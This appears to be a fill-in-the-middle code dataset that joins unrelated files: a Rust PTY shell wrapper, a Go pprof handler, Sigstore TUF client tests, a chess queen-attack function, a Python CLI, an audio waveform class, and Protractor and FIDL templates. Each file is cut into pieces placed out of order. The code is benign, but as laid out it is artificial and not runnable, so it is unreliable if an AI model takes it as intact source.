FilteredBuffer {
raw: Buffer::new(),
filter: Filter::new(),
}
}
fn fill(&mut self, fd: RawFd) -> nix::Result<bool> {
if !self.raw.fill(fd)? {
return Ok(false);
}
self.filter.fill(&self.raw.buf[0..self.raw.count]);
self.raw.count = 0;
Ok(true)
}
fn flush(&mut self, fd: RawFd) -> nix::Result<()> {
{
let buf = self.filter.buffer();
write_all(fd, buf)?;
}
self.filter.clear_buffer();
Ok(())
}
}
pub struct Pty {
master_fd: PtyMaster,
peer_fd: RawFd,
check_interval: Duration,
last_check_time: Option<Instant>,
}
impl Pty {
pub fn new() -> nix::Result<Pty> {
// Open a new PTY master
let master_fd = posix_openpt(OFlag::O_RDWR)?;
// Allow a slave to be generated for it
grantpt(&master_fd)?;
unlockpt(&master_fd)?;
// Get the name of the slave
let peer_name = unsafe { ptsname(&master_fd) }?;
// Try to open the slave
let peer_fd = open(Path::new(&peer_name), OFlag::O_RDWR, Mode::empty())?;
Ok(Pty {
master_fd,
peer_fd,
check_interval: MIN_CHECK_INTERVAL,
last_check_time: None,
})
}
fn child_setup(peer_fd: RawFd) -> nix::Result<()> {
dup2(peer_fd, 0)?;
dup2(peer_fd, 1)?;
dup2(peer_fd, 2)?;
setsid()?;
Ok(())
}
fn close_peer_fd(&mut self) -> nix::Result<()> {
if self.peer_fd != -1 {
let res = close(self.peer_fd);
self.peer_fd = -1;
res
} else {
Ok(())
}
}
pub fn fork(&mut self) -> io::Result<u32> {
let mut proc = Command::new("/bin/bash");
let peer_fd = self.peer_fd;
unsafe {
proc.pre_exec(move || match Self::child_setup(peer_fd) {
Ok(()) => Ok(()),
Err(nix::Error::Sys(e)) => return Err(e.into()),
Err(e) => {
return Err(io::Error::new(
io::ErrorKind::Other,
format!("Spawn failed: {}", e),
))
} | let child = proc.spawn()?;
self.close_peer_fd().unwrap();
Ok(child.id())
}
fn maybe_check<A>(&mut self, actions: &mut A, from_child: &mut FilteredBuffer) -> Duration
where
A: PtyActions,
{
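// Run the periodic check once its deadline has passed, then back off
// exponentially (x5, capped at MAX_CHECK_INTERVAL); otherwise return how
// long epoll_wait may block before the next check is due.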
let now = Instant::now();
let next_check_time = if let Some(last_check_time) = self.last_check_time {
last_check_time + self.check_interval
} else {
now
};
if next_check_time <= now {
actions.check();
let in_window_title = from_child.filter.in_window_title();
let out_window_title = actions.make_window_title(in_window_title);
from_child.filter.set_out_window_title(&out_window_title);
let _ = from_child.flush(STDOUT);
self.check_interval = min(
MAX_CHECK_INTERVAL,
self.check_interval * CHECK_INTERVAL_MULTIPLIER,
);
self.last_check_time = Some(now);
self.check_interval
} else {
next_check_time - now
}
}
pub fn handle<A>(&mut self, actions: &mut A) -> nix::Result<()>
where
A: PtyActions,
{
let raw_input = RawInput::setup();
// Match by reference: `if let Err(e) = raw_input` would move (and immediately
// drop) the RawInput guard, restoring the original terminal attributes too early.
if let Err(e) = &raw_input {
println!("Can't setup raw input: {}", e);
};
let master_fd = self.master_fd.as_raw_fd();
let epoll_fd = epoll_create()?;
let mut from_child = FilteredBuffer::new();
let mut to_child = Buffer::new();
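// Register the PTY master (token 0) and our stdin (token 1) with epoll;
// the tokens are matched against event.data() in the loop below.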
let mut event = EpollEvent::new(EpollFlags::EPOLLIN, 0);
epoll_ctl(epoll_fd, EpollOp::EpollCtlAdd, master_fd, &mut event)?;
let mut event = EpollEvent::new(EpollFlags::EPOLLIN, 1);
epoll_ctl(epoll_fd, EpollOp::EpollCtlAdd, STDIN, &mut event)?;
let mut events = vec![EpollEvent::empty(), EpollEvent::empty()];
let mut done = false;
while !done {
let remaining = self.maybe_check(actions, &mut from_child);
let event_count = epoll_wait(
epoll_fd,
&mut events,
remaining.as_millis().try_into().unwrap(),
)?;
for event in &events[0..event_count] {
match event.data() {
0 => {
if event.events().contains(EpollFlags::EPOLLIN)
|| event.events().contains(EpollFlags::EPOLLHUP)
{
if from_child.fill(master_fd)? {
from_child.flush(STDOUT)?;
self.check_interval = MIN_CHECK_INTERVAL;
} else {
done = true;
}
}
}
1 => {
if event.events().contains(EpollFlags::EPOLLIN)
|| event.events().contains(EpollFlags::EPOLLHUP)
{
if to_child.fill(STDIN)? {
to_child.flush(master_fd)?;
} else {
done = true;
}
}
}
_ => (),
}
}
}
Ok(())
}
}
impl Drop for Pty {
fn drop(&mut self) {
self.close_peer_fd().unwrap();
}
}
pub trait PtyActions {
fn check(&mut self);
fn make_window_title(&self, in_window_title: &str) -> String {
in_window_title.to_string()
}
} | });
}
|
pprof.go | package code
import (
"net/http"
_ "net/http/pprof"
"strings"
ice "github.com/shylinux/icebergs"
"github.com/shylinux/icebergs/base/aaa"
"github.com/shylinux/icebergs/base/cli"
"github.com/shylinux/icebergs/base/mdb"
"github.com/shylinux/icebergs/base/nfs"
"github.com/shylinux/icebergs/base/tcp"
"github.com/shylinux/icebergs/base/web"
kit "github.com/shylinux/toolkits"
)
const (
BINNARY = "binnary"
SERVICE = "service"
SECONDS = "seconds"
)
const PPROF = "pprof"
func init() | {
Index.Merge(&ice.Context{
Configs: map[string]*ice.Config{
PPROF: {Name: PPROF, Help: "performance profiling", Value: kit.Data(kit.MDB_SHORT, kit.MDB_ZONE,
PPROF, []string{GO, "tool", PPROF},
)},
},
Commands: map[string]*ice.Command{
"/pprof/": {Name: "/pprof/", Help: "性能分析", Hand: func(m *ice.Message, c *ice.Context, cmd string, arg ...string) {
m.R.URL.Path = strings.Replace("/code"+m.R.URL.Path, "code", "debug", 1)
http.DefaultServeMux.ServeHTTP(m.W, m.R)
m.Render(ice.RENDER_VOID)
}},
PPROF: {Name: "pprof zone id auto create", Help: "性能分析", Action: map[string]*ice.Action{
mdb.CREATE: {Name: "create zone=some binnary service seconds=3", Help: "create", Hand: func(m *ice.Message, arg ...string) {
m.Cmdy(mdb.INSERT, PPROF, "", mdb.HASH, arg)
}},
mdb.INSERT: {Name: "insert zone type name text", Help: "insert", Hand: func(m *ice.Message, arg ...string) {
m.Cmdy(mdb.INSERT, PPROF, "", mdb.HASH, kit.MDB_ZONE, arg[1])
m.Cmdy(mdb.INSERT, PPROF, "", mdb.ZONE, m.Option(kit.MDB_ZONE), arg[2:])
}},
mdb.MODIFY: {Name: "modify", Help: "edit", Hand: func(m *ice.Message, arg ...string) {
m.Cmdy(mdb.MODIFY, PPROF, "", mdb.ZONE, m.Option(kit.MDB_ZONE), m.Option(kit.MDB_ID), arg)
}},
mdb.REMOVE: {Name: "remove", Help: "remove", Hand: func(m *ice.Message, arg ...string) {
m.Cmdy(mdb.DELETE, PPROF, "", mdb.HASH, m.OptionSimple(kit.MDB_ZONE))
}},
mdb.INPUTS: {Name: "inputs", Help: "complete", Hand: func(m *ice.Message, arg ...string) {
switch arg[0] {
case BINNARY:
m.Cmd(nfs.DIR, "bin/", "path,size,time").Table(func(index int, value map[string]string, head []string) {
m.Push(BINNARY, value["path"])
m.Push("", value, []string{"size,time"})
})
case SERVICE:
m.Cmd(web.SPIDE).Table(func(index int, value map[string]string, head []string) {
m.Push(SERVICE, kit.MergeURL2(value["client.url"], "/debug/pprof/profile"))
})
}
}},
cli.RUN: {Name: "run", Help: "run", Hand: func(m *ice.Message, arg ...string) {
msg := m.Cmd(web.SPIDE, web.SPIDE_DEV, web.SPIDE_CACHE, web.SPIDE_GET, m.Option(SERVICE), SECONDS, m.Option(SECONDS))
cmd := kit.Simple(m.Confv(PPROF, kit.Keym(PPROF)), "-text", m.Option(BINNARY), msg.Append(kit.MDB_FILE))
res := strings.Split(m.Cmdx(cli.SYSTEM, cmd), ice.MOD_NL)
if len(res) > 20 {
res = res[:20]
}
m.Cmd(mdb.INSERT, PPROF, "", mdb.ZONE, m.Option(kit.MDB_ZONE),
kit.MDB_TEXT, strings.Join(res, ice.MOD_NL), kit.MDB_FILE, msg.Append(kit.MDB_FILE))
m.Echo(strings.Join(res, ice.MOD_NL))
m.ProcessInner()
}},
web.SERVE: {Name: "serve", Help: "display", Hand: func(m *ice.Message, arg ...string) {
u := kit.ParseURL(m.Option(ice.MSG_USERWEB))
p := u.Hostname() + ":" + m.Cmdx(tcp.PORT, aaa.RIGHT)
m.Cmd(cli.DAEMON, m.Confv(PPROF, kit.Keym(PPROF)), "-http="+p, m.Option(BINNARY), m.Option(kit.MDB_FILE))
m.Echo("http://%s/ui/top", p)
m.ProcessInner()
}},
}, Hand: func(m *ice.Message, c *ice.Context, cmd string, arg ...string) {
m.Fields(len(arg), "time,zone,count,binnary,service,seconds", "time,id,text,file")
if m.Cmdy(mdb.SELECT, PPROF, "", mdb.ZONE, arg); len(arg) == 0 {
m.PushAction(cli.RUN, mdb.REMOVE)
return
}
m.Table(func(index int, value map[string]string, head []string) {
m.PushDownload(kit.MDB_LINK, "pprof.pd.gz", value[kit.MDB_FILE])
m.PushButton(web.SERVE)
})
}},
},
})
}
|
|
client_test.go | //
// Copyright 2021 The Sigstore Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package tuf
import (
"bytes"
"context"
"encoding/json"
"io/ioutil"
"net/http"
"net/http/httptest"
"os"
"path/filepath"
"reflect"
"sort"
"strings"
"testing"
"time"
"github.com/google/go-cmp/cmp"
"github.com/google/go-cmp/cmp/cmpopts"
"github.com/theupdateframework/go-tuf"
"github.com/theupdateframework/go-tuf/data"
"github.com/theupdateframework/go-tuf/verify"
)
var targets = []string{
"artifact.pub",
"fulcio.crt.pem",
"fulcio_v1.crt.pem",
"ctfe.pub",
"rekor.pub",
}
func TestNewFromEnv(t *testing.T) {
td := t.TempDir()
t.Setenv("TUF_ROOT", td)
ctx := context.Background()
// Make sure nothing is expired
tuf, err := NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
checkTargetsAndMeta(t, tuf)
tuf.Close()
// Now try with expired targets
forceExpiration(t, true)
tuf, err = NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
checkTargetsAndMeta(t, tuf)
tuf.Close()
if err := Initialize(ctx, DefaultRemoteRoot, nil); err != nil |
if l := dirLen(t, td); l == 0 {
t.Errorf("expected filesystem writes, got %d entries", l)
}
// And go from there!
tuf, err = NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
checkTargetsAndMeta(t, tuf)
tuf.Close()
}
func TestNoCache(t *testing.T) {
ctx := context.Background()
// Once more with NO_CACHE
t.Setenv("SIGSTORE_NO_CACHE", "true")
td := t.TempDir()
t.Setenv("TUF_ROOT", td)
// Force expiration so we have some content to download
forceExpiration(t, true)
tuf, err := NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
checkTargetsAndMeta(t, tuf)
tuf.Close()
if l := dirLen(t, td); l != 0 {
t.Errorf("expected no filesystem writes, got %d entries", l)
}
}
func TestCache(t *testing.T) {
ctx := context.Background()
// Now with caching enabled (SIGSTORE_NO_CACHE=false)
t.Setenv("SIGSTORE_NO_CACHE", "false")
td := t.TempDir()
t.Setenv("TUF_ROOT", td)
// Make sure nothing is in that directory to start with
if l := dirLen(t, td); l != 0 {
t.Errorf("expected no filesystem writes, got %d entries", l)
}
// Nothing should get downloaded if everything is up to date
forceExpiration(t, false)
tuf, err := NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
tuf.Close()
if l := dirLen(t, td); l != 0 {
t.Errorf("expected no filesystem writes, got %d entries", l)
}
// Force expiration so that content gets downloaded. This should write to disk
forceExpiration(t, true)
tuf, err = NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
tuf.Close()
if l := dirLen(t, td); l == 0 {
t.Errorf("expected filesystem writes, got %d entries", l)
}
checkTargetsAndMeta(t, tuf)
}
func TestCustomRoot(t *testing.T) {
ctx := context.Background()
// Create a remote repository.
td := t.TempDir()
remote, r := newTufRepo(t, td, "foo")
// Serve remote repository.
s := httptest.NewServer(http.FileServer(http.Dir(filepath.Join(td, "repository"))))
defer s.Close()
// Initialize with custom root.
tufRoot := t.TempDir()
t.Setenv("TUF_ROOT", tufRoot)
meta, err := remote.GetMeta()
if err != nil {
t.Error(err)
}
rootBytes, ok := meta["root.json"]
if !ok {
t.Error(err)
}
if err := Initialize(ctx, s.URL, rootBytes); err != nil {
t.Error(err)
}
if l := dirLen(t, tufRoot); l == 0 {
t.Errorf("expected filesystem writes, got %d entries", l)
}
// Successfully get target.
tufObj, err := NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
if b, err := tufObj.GetTarget("foo.txt"); err != nil || !bytes.Equal(b, []byte("foo")) {
t.Fatal(err)
}
tufObj.Close()
// Force expiration on the first timestamp and internal go-tuf verification.
forceExpirationVersion(t, 1)
oldIsExpired := verify.IsExpired
verify.IsExpired = func(time time.Time) bool {
return true
}
if _, err = NewFromEnv(ctx); err == nil {
t.Errorf("expected expired timestamp from the remote")
}
// Let internal TUF verification succeed normally now.
verify.IsExpired = oldIsExpired
// Update remote targets, issue a timestamp v2.
updateTufRepo(t, td, r, "foo1")
// Use newTuf and successfully get updated metadata using the cached remote location.
tufObj, err = NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
if b, err := tufObj.GetTarget("foo.txt"); err != nil || !bytes.Equal(b, []byte("foo1")) {
t.Fatal(err)
}
tufObj.Close()
}
func TestGetTargetsByMeta(t *testing.T) {
ctx := context.Background()
// Create a remote repository.
td := t.TempDir()
remote, _ := newTufCustomRepo(t, td, "foo")
// Serve remote repository.
s := httptest.NewServer(http.FileServer(http.Dir(filepath.Join(td, "repository"))))
defer s.Close()
// Initialize with custom root.
tufRoot := t.TempDir()
t.Setenv("TUF_ROOT", tufRoot)
meta, err := remote.GetMeta()
if err != nil {
t.Error(err)
}
rootBytes, ok := meta["root.json"]
if !ok {
t.Error(err)
}
if err := Initialize(ctx, s.URL, rootBytes); err != nil {
t.Error(err)
}
if l := dirLen(t, tufRoot); l == 0 {
t.Errorf("expected filesystem writes, got %d entries", l)
}
tufObj, err := NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
defer tufObj.Close()
// Fetch a target with no custom metadata.
targets, err := tufObj.GetTargetsByMeta(UnknownUsage, []string{"fooNoCustom.txt"})
if err != nil {
t.Fatal(err)
}
if len(targets) != 1 {
t.Fatalf("expected one target without custom metadata, got %d targets", len(targets))
}
if !bytes.Equal(targets[0].Target, []byte("foo")) {
t.Fatalf("target metadata mismatched, expected: %s, got: %s", "foo", string(targets[0].Target))
}
if targets[0].Status != Active {
t.Fatalf("target without custom metadata not active, got: %v", targets[0].Status)
}
// Fetch multiple targets with no custom metadata.
targets, err = tufObj.GetTargetsByMeta(UnknownUsage, []string{"fooNoCustom.txt", "fooNoCustomOther.txt"})
if err != nil {
t.Fatal(err)
}
if len(targets) != 2 {
t.Fatalf("expected two targets without custom metadata, got %d targets", len(targets))
}
if targets[0].Status != Active || targets[1].Status != Active {
t.Fatalf("target without custom metadata not active, got: %v and %v", targets[0].Status, targets[1].Status)
}
// Fetch targets with custom metadata.
targets, err = tufObj.GetTargetsByMeta(Fulcio, []string{"fooNoCustom.txt"})
if err != nil {
t.Fatal(err)
}
if len(targets) != 2 {
t.Fatalf("expected two targets without custom metadata, got %d targets", len(targets))
}
targetBytes := []string{string(targets[0].Target), string(targets[1].Target)}
expectedTB := []string{"foo", "foo"}
if !reflect.DeepEqual(targetBytes, expectedTB) {
t.Fatalf("target metadata mismatched, expected: %v, got: %v", expectedTB, targetBytes)
}
targetStatuses := []StatusKind{targets[0].Status, targets[1].Status}
sort.Slice(targetStatuses, func(i, j int) bool {
return targetStatuses[i] < targetStatuses[j]
})
expectedTS := []StatusKind{Active, Expired}
if !reflect.DeepEqual(targetStatuses, expectedTS) {
t.Fatalf("unexpected target status with custom metadata, expected %v, got: %v", expectedTS, targetStatuses)
}
// Error when fetching target that does not exist.
_, err = tufObj.GetTargetsByMeta(UsageKind(UnknownStatus), []string{"unknown.txt"})
expectedErr := "file not found: unknown.txt"
if !strings.Contains(err.Error(), "file not found: unknown.txt") {
t.Fatalf("unexpected error fetching missing metadata, expected: %s, got: %s", expectedErr, err.Error())
}
}
func checkTargetsAndMeta(t *testing.T, tuf *TUF) {
// Check the targets
t.Helper()
for _, target := range targets {
if _, err := tuf.GetTarget(target); err != nil {
t.Fatal(err)
}
}
// An invalid target
if _, err := tuf.GetTarget("invalid"); err == nil {
t.Error("expected error reading target, got nil")
}
// Check root status matches
status, err := tuf.getRootStatus()
if err != nil {
t.Fatal(err)
}
if !cmp.Equal(targets, status.Targets,
cmpopts.SortSlices(func(a, b string) bool { return a < b })) {
t.Errorf("mismatched targets, expected %s, got %s", targets, status.Targets)
}
}
func dirLen(t *testing.T, td string) int {
t.Helper()
de, err := os.ReadDir(td)
if err != nil {
t.Fatal(err)
}
return len(de)
}
func forceExpiration(t *testing.T, expire bool) {
oldIsExpiredTimestamp := isExpiredTimestamp
isExpiredTimestamp = func(_ []byte) bool {
return expire
}
t.Cleanup(func() {
isExpiredTimestamp = oldIsExpiredTimestamp
})
}
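// forceExpirationVersion treats any timestamp metadata at or below the given
// version as expired, forcing the client to fetch a newer timestamp.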
func forceExpirationVersion(t *testing.T, version int) {
oldIsExpiredTimestamp := isExpiredTimestamp
isExpiredTimestamp = func(metadata []byte) bool {
s := &data.Signed{}
if err := json.Unmarshal(metadata, s); err != nil {
return true
}
sm := &data.Timestamp{}
if err := json.Unmarshal(s.Signed, sm); err != nil {
return true
}
return sm.Version <= version
}
t.Cleanup(func() {
isExpiredTimestamp = oldIsExpiredTimestamp
})
}
// newTufCustomRepo initializes a TUF repository with root, targets, snapshot, and timestamp roles
// 4 targets are created to exercise various code paths, including two targets with no custom metadata,
// one target with custom metadata marked as active, and another with custom metadata marked as expired.
func newTufCustomRepo(t *testing.T, td string, targetData string) (tuf.LocalStore, *tuf.Repo) {
scmActive, err := json.Marshal(&sigstoreCustomMetadata{Sigstore: customMetadata{Usage: Fulcio, Status: Active}})
if err != nil {
t.Error(err)
}
scmExpired, err := json.Marshal(&sigstoreCustomMetadata{Sigstore: customMetadata{Usage: Fulcio, Status: Expired}})
if err != nil {
t.Error(err)
}
remote := tuf.FileSystemStore(td, nil)
r, err := tuf.NewRepo(remote)
if err != nil {
t.Error(err)
}
if err := r.Init(false); err != nil {
t.Error(err)
}
for _, role := range []string{"root", "targets", "snapshot", "timestamp"} {
if _, err := r.GenKey(role); err != nil {
t.Error(err)
}
}
for name, scm := range map[string]json.RawMessage{
"fooNoCustom.txt": nil, "fooNoCustomOther.txt": nil,
"fooActive.txt": scmActive, "fooExpired.txt": scmExpired} {
targetPath := filepath.Join(td, "staged", "targets", name)
if err := os.MkdirAll(filepath.Dir(targetPath), 0755); err != nil {
t.Error(err)
}
if err := ioutil.WriteFile(targetPath, []byte(targetData), 0600); err != nil {
t.Error(err)
}
if err := r.AddTarget(name, scm); err != nil {
t.Error(err)
}
}
if err := r.Snapshot(); err != nil {
t.Error(err)
}
if err := r.Timestamp(); err != nil {
t.Error(err)
}
if err := r.Commit(); err != nil {
t.Error(err)
}
return remote, r
}
func newTufRepo(t *testing.T, td string, targetData string) (tuf.LocalStore, *tuf.Repo) {
remote := tuf.FileSystemStore(td, nil)
r, err := tuf.NewRepo(remote)
if err != nil {
t.Error(err)
}
if err := r.Init(false); err != nil {
t.Error(err)
}
for _, role := range []string{"root", "targets", "snapshot", "timestamp"} {
if _, err := r.GenKey(role); err != nil {
t.Error(err)
}
}
targetPath := filepath.Join(td, "staged", "targets", "foo.txt")
if err := os.MkdirAll(filepath.Dir(targetPath), 0755); err != nil {
t.Error(err)
}
if err := ioutil.WriteFile(targetPath, []byte(targetData), 0600); err != nil {
t.Error(err)
}
if err := r.AddTarget("foo.txt", nil); err != nil {
t.Error(err)
}
if err := r.Snapshot(); err != nil {
t.Error(err)
}
if err := r.Timestamp(); err != nil {
t.Error(err)
}
if err := r.Commit(); err != nil {
t.Error(err)
}
return remote, r
}
func updateTufRepo(t *testing.T, td string, r *tuf.Repo, targetData string) {
targetPath := filepath.Join(td, "staged", "targets", "foo.txt")
if err := os.MkdirAll(filepath.Dir(targetPath), 0755); err != nil {
t.Error(err)
}
if err := ioutil.WriteFile(targetPath, []byte(targetData), 0600); err != nil {
t.Error(err)
}
if err := r.AddTarget("foo.txt", nil); err != nil {
t.Error(err)
}
if err := r.Snapshot(); err != nil {
t.Error(err)
}
if err := r.Timestamp(); err != nil {
t.Error(err)
}
if err := r.Commit(); err != nil {
t.Error(err)
}
}
| {
t.Error(err)
} |
queenattack.go | package queenattack
import (
"errors"
"math"
)
// QueenAttack determines whether two queens can attack each other in chess
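// Illustrative usage (assumes algebraic coordinates like "a1"):
//   ok, err := QueenAttack("c3", "f6") // ok == true: shared diagonal
//   ok, err = QueenAttack("a1", "b3")  // ok == false: no shared line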
func QueenAttack(posOne, posTwo string) (bool, error) {
if posOne == posTwo {
return false, errors.New("queens on same space")
} else if (posOne[0] == posTwo[0]) || (posOne[1] == posTwo[1]) {
return true, nil
} else if math.Abs(float64(posOne[0])-float64(posTwo[0])) == math.Abs(float64(posOne[1])-float64(posTwo[1])) |
return false, nil
}
| {
return true, nil
} |
commands.py | # -*- coding: utf-8 -*-
"""bootstrap_py.commands."""
import os
import sys
import re
import argparse
from bootstrap_py import control, __prog__, __version__
from bootstrap_py.update import Update
from bootstrap_py.exceptions import BackendFailure, Conflict
def setoption(parser, metadata=None):
"""Set argument parser option."""
parser.add_argument('-v', action='version',
version=__version__)
subparsers = parser.add_subparsers(help='sub commands help')
create_cmd = subparsers.add_parser('create')
create_cmd.add_argument('name',
help='Specify Python package name.')
create_cmd.add_argument('-d', dest='description', action='store',
help='Short description about your package.')
create_cmd.add_argument('-a', dest='author', action='store',
required=True,
help='Python package author name.')
create_cmd.add_argument('-e', dest='email', action='store',
required=True,
help='Python package author email address.')
create_cmd.add_argument('-l', dest='license',
choices=metadata.licenses().keys(),
default='GPLv3+',
help='Specify license. (default: %(default)s)')
create_cmd.add_argument('-s', dest='status',
choices=metadata.status().keys(),
default='Alpha',
help=('Specify development status. '
'(default: %(default)s)'))
create_cmd.add_argument('--no-check', action='store_true',
help='No checking package name in PyPI.')
create_cmd.add_argument('--with-samples', action='store_true',
help='Generate package with sample code.')
group = create_cmd.add_mutually_exclusive_group(required=True)
group.add_argument('-U', dest='username', action='store',
help='Specify GitHub username.')
group.add_argument('-u', dest='url', action='store', type=valid_url,
help='Python package homepage url.')
create_cmd.add_argument('-o', dest='outdir', action='store',
default=os.path.abspath(os.path.curdir),
help='Specify output directory. (default: $PWD)')
list_cmd = subparsers.add_parser('list')
list_cmd.add_argument('-l', dest='licenses', action='store_true',
help='show license choices.')
def valid_url(url):
"""Validate url.
:rtype: str
:return: url
:param str url: package homepage url.
"""
regex = re.compile(
r'^(?:http)s?://'
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+'
r'(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?))'
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
if not regex.match(url):
raise argparse.ArgumentTypeError('"{0}" is invalid url.'.format(url))
return url
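# e.g. valid_url('https://example.com/pkg') returns the url unchanged, while
# valid_url('ftp://example.com') raises argparse.ArgumentTypeError.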
def parse_options(metadata):
|
def main():
"""Execute main processes."""
try:
pkg_version = Update()
if pkg_version.updatable():
pkg_version.show_message()
metadata = control.retreive_metadata()
parser = parse_options(metadata)
argvs = sys.argv
if len(argvs) <= 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
control.print_licences(args, metadata)
control.check_repository_existence(args)
control.check_package_existence(args)
control.generate_package(args)
except (RuntimeError, BackendFailure, Conflict) as exc:
sys.stderr.write('{0}\n'.format(exc))
sys.exit(1)
if __name__ == '__main__':
main()
| """Parse argument options."""
parser = argparse.ArgumentParser(description='%(prog)s usage:',
prog=__prog__)
setoption(parser, metadata=metadata)
return parser |
audio.py | from __future__ import annotations
from dataclasses import dataclass
import pydub
from sauronlab.core.core_imports import *
class AudioTools:
""" """
@classmethod
def save(
cls, audio_segment: pydub.AudioSegment, path: PathLike, audio_format: str = "flac"
) -> None:
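"""Writes ``audio_segment`` to ``path`` in ``audio_format`` (FLAC by default)."""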
path = Tools.prepped_file(path)
audio_segment.export(path, format=audio_format)
@classmethod
def load_pydub(cls, path: PathLike) -> pydub.AudioSegment:
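"""Reads the audio file at ``path`` into a :class:`pydub.AudioSegment`."""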
path = str(Path(path))
# TODO sample_width=2, frame_rate=44100, channels=1 ???
return pydub.AudioSegment.from_file(path)
@dataclass(frozen=True)
class Waveform:
"""
Contains an array representing an audio waveform.
Also has a sampling rate, a name, an optional description, and an optional file path.
"""
name: str
path: Optional[str]
data: np.array
sampling_rate: float
minimum: Optional[float]
maximum: Optional[float]
description: Optional[str] = None
start_ms: Optional[float] = None
end_ms: Optional[float] = None
@property
def n_ms(self) -> float:
""""""
return len(self.data) / self.sampling_rate * 1000
def standardize(
self, minimum: float = 0, maximum: float = 255, ms_freq: int = 1000
) -> Waveform:
"""
Downsamples to ``ms_freq`` Hz (1000 by default) and normalizes to between
``minimum`` and ``maximum`` (0 and 255 by default).
This is useful for various purposes in Sauronlab, such as embedding into plots.
Args:
    minimum: Lower bound of the normalized range (must be >= 0)
    maximum: Upper bound of the normalized range (must be <= 255)
    ms_freq: Target sampling rate in Hz
Returns:
    The standardized Waveform as a copy
"""
if minimum < 0 or maximum > 255:
raise OutOfRangeError("Must be between 0 and 255")
y = self.downsample(ms_freq).data
y = (y - y.min()) * (maximum - minimum) / (y.max() - y.min()) + minimum
y = y.round().astype(np.int32)
s = Waveform(self.name, self.path, y, ms_freq, minimum, maximum, self.description)
# s.n_ms = int(s.n_ms) # TODO: all ok, right?
return s
def normalize(self, minimum: float = -1, maximum: float = 1) -> Waveform:
|
def downsample(self, new_sampling_hertz: float) -> Waveform:
"""
Downsamples to a new rate.
Splits data into discrete chunks and then calculates mean for those chunks.
Args:
new_sampling_hertz: A float such as 44100
Returns:
The same Waveform as a copy
"""
t0 = time.monotonic()
if new_sampling_hertz > self.sampling_rate:
raise OutOfRangeError(
f"New sampling rate is higher than current of {self.sampling_rate}"
)
chunk_size = int(self.sampling_rate / new_sampling_hertz)
groups = [self.data[x : x + chunk_size] for x in range(0, len(self.data), chunk_size)]
means = np.array([sum(group) / len(group) for group in groups])
z = Waveform(
self.name,
self.path,
means,
new_sampling_hertz,
self.minimum,
self.maximum,
self.description,
)
logger.debug(f"Downsampling waveform ({self.name}) took {round(time.monotonic()-t0, 1)} s")
return z
def slice_ms(self, start_ms: int, end_ms: int) -> Waveform:
"""
Gets a section of the waveform.
Args:
start_ms: The start milliseconds
end_ms: The end milliseconds
Returns:
The same Waveform as a copy
"""
a = int(round(self.sampling_rate * start_ms / 1000))
b = int(round(self.sampling_rate * end_ms / 1000))
return Waveform(
self.name,
self.path,
self.data[a:b],
self.sampling_rate,
self.minimum,
self.maximum,
self.description,
a,
b,
)
def __repr__(self):
me = self.__class__.__name__
sec = round(self.n_ms / 1000, 1)
return (
f"{me}({self.name} @ {self.sampling_rate}, n={len(self.data)}, {sec}s"
+ f" {self.minimum}-{self.maximum}"
)
def __str__(self):
return repr(self)
__all__ = ["AudioTools", "Waveform"]
| """
Constrains values between ``minimum`` and ``maximum`` (-1 and 1 by default).
Args:
minimum: Normally -1
maximum: Normally 1
Returns:
The same Waveform as a copy
"""
y = (self.data - self.data.min()) * (maximum - minimum) / (
self.data.max() - self.data.min()
) + minimum
logger.error(f"Normalized {self.name}. max={y.max()}, min={y.min()}")
return Waveform(
self.name, self.path, y, self.sampling_rate, minimum, maximum, self.description
) |
app.po.ts | import { browser, by, element } from 'protractor';
export class | {
navigateTo() {
return browser.get('/');
}
getParagraphText() {
return element(by.css('app-root h1 small')).getText();
}
}
| AppPage |
xunion.tmpl.go | // Copyright 2019 The Fuchsia Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package templates
| const XUnion = `
{{- define "XUnionDeclaration" -}}
enum {{ .TagName }} {
{{- range .Members }}
{{ .Tag }}, // {{ .Ordinal | printf "%#x" }}
{{- end }}
}
const Map<int, {{ .TagName }}> _{{ .TagName }}_map = {
{{- range .Members }}
{{ .Ordinal }}: {{ $.TagName }}.{{ .Tag }},
{{- end }}
};
{{range .Doc }}
///{{ . -}}
{{- end }}
class {{ .Name }} extends $fidl.XUnion {
{{- range .Members }}
const {{ $.Name }}.with{{ .CtorName }}({{ .Type.Decl }} value)
: _ordinal = {{ .Ordinal }}, _data = value;
{{- end }}
{{ .Name }}._(int ordinal, Object data) : _ordinal = ordinal, _data = data;
final int _ordinal;
final _data;
{{ .TagName }} get $tag => _{{ .TagName }}_map[_ordinal];
{{range .Members }}
{{ .Type.Decl }} get {{ .Name }} {
if (_ordinal != {{ .Ordinal }}) {
return null;
}
return _data;
}
{{- end }}
@override
String toString() {
switch (_ordinal) {
{{- range .Members }}
case {{ .Ordinal }}:
return '{{ $.Name }}.{{ .Name }}(${{ .Name }})';
{{- end }}
default:
return null;
}
}
@override
int get $ordinal => _ordinal;
@override
Object get $data => _data;
static {{ .Name }} _ctor(int ordinal, Object data) {
return {{ .Name }}._(ordinal, data);
}
}
// See FIDL-308:
// ignore: recursive_compile_time_constant
const $fidl.XUnionType<{{ .Name }}> {{ .TypeSymbol }} = {{ .TypeExpr }};
const $fidl.XUnionType<{{ .Name }}> {{ .OptTypeSymbol }} = {{ .OptTypeExpr }};
{{ end }}
` | // XUnion is the template for xunion declarations. |
